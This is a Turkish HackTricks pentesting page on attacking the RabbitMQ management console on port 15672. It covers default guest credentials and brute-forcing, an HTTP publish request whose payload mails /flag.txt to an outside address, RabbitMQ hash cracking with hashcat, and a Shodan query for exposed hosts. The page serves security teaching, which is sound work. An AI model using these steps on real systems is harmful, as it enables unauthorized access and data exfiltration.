hacktricks/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md

61 lines
2.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 15672 - Pentesting RabbitMQ Management
{{#include ../banners/hacktricks-training.md}}
<figure><img src="../images/i3.png" alt=""><figcaption></figcaption></figure>
**Hata ödülü ipucu**: **Intigriti** için **kayıt olun**, **hack'ler tarafından, hack'ler için oluşturulmuş bir premium hata ödülü platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Temel Bilgiler
RabbitMQ hakkında daha fazla bilgi edinebilirsiniz [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\
Bu portta, [management plugin](https://www.rabbitmq.com/management.html) etkinleştirildiyse RabbitMQ Yönetim web konsolunu bulabilirsiniz.\
Ana sayfa şöyle görünmelidir:
![](<../images/image (336).png>)
## Sayım
Varsayılan kimlik bilgileri "_**guest**_":"_**guest**_". Eğer bunlar çalışmıyorsa, [**giriş için brute-force deneyebilirsiniz**](../generic-hacking/brute-force.md#http-post-form).
Bu modülü manuel olarak başlatmak için şunu çalıştırmanız gerekir:
```
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```
Doğru bir şekilde kimlik doğruladıktan sonra admin konsolunu göreceksiniz:
![](<../images/image (441).png>)
Ayrıca, geçerli kimlik bilgilerine sahipseniz `http://localhost:15672/api/connections` adresindeki bilgilerin ilginç olabileceğini görebilirsiniz.
Ayrıca, bu hizmetin API'sini kullanarak **bir kuyruğa veri yayınlamak** mümkün olduğunu unutmayın; bir istekle:
```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
## Hash Kırma
```bash
echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
```
### Shodan
- `port:15672 http`
<figure><img src="../images/i3.png" alt=""><figcaption></figcaption></figure>
**Hata ödülü ipucu**: **Intigriti** için **kayıt olun**, **hackerlar tarafından, hackerlar için oluşturulmuş premium bir hata ödülü platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
{% embed url="https://go.intigriti.com/hacktricks" %}
{{#include ../banners/hacktricks-training.md}}